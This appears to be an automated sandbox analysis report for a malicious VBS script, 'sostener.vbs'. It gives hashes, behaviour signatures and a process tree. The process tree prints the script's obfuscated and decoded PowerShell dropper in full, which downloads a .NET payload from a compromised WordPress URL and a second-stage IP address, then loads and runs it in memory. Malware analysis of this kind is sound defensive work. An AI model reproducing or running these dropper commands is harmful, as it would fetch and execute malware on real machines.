Overview

overview

10

Static

static

1

sostener.vbs

windows7-x64

10

sostener.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-09-2024 08:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sostener.vbs

  • Size

    438KB

  • MD5

    7038e85f1e6e6405981b64ff58358482

  • SHA1

    9df67362f01d7a33a02a708fa6da1c3a1214fc51

  • SHA256

    a1a8e23d2f66e05da76366469a1a344973fb1d775a943656de0f90bf0306e447

  • SHA512

    e9bc9b726b17f8f513d36054647537d6e494bfb0087306ca52ca0f1f95785afa705ede98baaf71f19fead408f434a061a34ac6f0c457b0b77bdc51f93005c676

  • SSDEEP

    96:OffffUffffUfffflDXc7lYm8ky0xbFi1msE4VIAGYALFCN8V0bf:s7OlYm8kyIhi1msJVIAGYAZCN8qf

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J▒Bz▒HE▒YQBh▒Go▒I▒▒9▒C▒▒Jw▒w▒DE▒Mw▒n▒Ds▒J▒B3▒Gk▒a▒Bs▒HY▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒G4▒dQBv▒GE▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒dwB3▒Hc▒LgBp▒G4▒ZgBv▒HI▒bQBh▒GM▒aQBv▒G4▒bwBw▒G8▒cgB0▒HU▒bgBh▒C4▒YwBv▒G0▒LwB3▒H▒▒LQBj▒G8▒bgB0▒GU▒bgB0▒C8▒dQBw▒Gw▒bwBh▒GQ▒cw▒v▒DI▒M▒▒y▒DQ▒Lw▒w▒Dk▒LwBk▒Gw▒b▒Bz▒Gs▒eQBm▒GE▒b▒▒u▒HQ▒e▒B0▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒Bu▒G4▒dQBv▒GE▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DE▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒HQ▒e▒B0▒C4▒MQBT▒EQ▒LwBT▒FY▒TgBF▒C8▒egBy▒GE▒TQ▒v▒Gc▒ZQBS▒C8▒awBh▒FQ▒Lw▒5▒DY▒MQ▒u▒DM▒Mw▒y▒C4▒Mg▒w▒DI▒Lg▒x▒Dk▒Lw▒v▒Do▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒dwBp▒Gg▒b▒B2▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bz▒HE▒YQBh▒Go▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2084

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    6a7974de816e53b87237556ba2ad3ca8

    SHA1

    d6ada0d8f741d81fe9a0a2cb6fed1b4624f2945c

    SHA256

    3ff52aaf0e60346f65c60bf4e1adc868ce3ee17b23015371fd07807985d818f2

    SHA512

    9fe6f3473a293dcf3530a29424742cbb951779164381bd1fe7f40717f82fd819102073166f603541b00af9925d2949033a6a21ef68b918a2e61f52a5f744d159

    Download Submit

  • memory/2072-4-0x000007FEF59BE000-0x000007FEF59BF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2072-5-0x000000001B4B0000-0x000000001B792000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2072-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2072-12-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2072-13-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2072-14-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

    Filesize

    9.6MB

    Download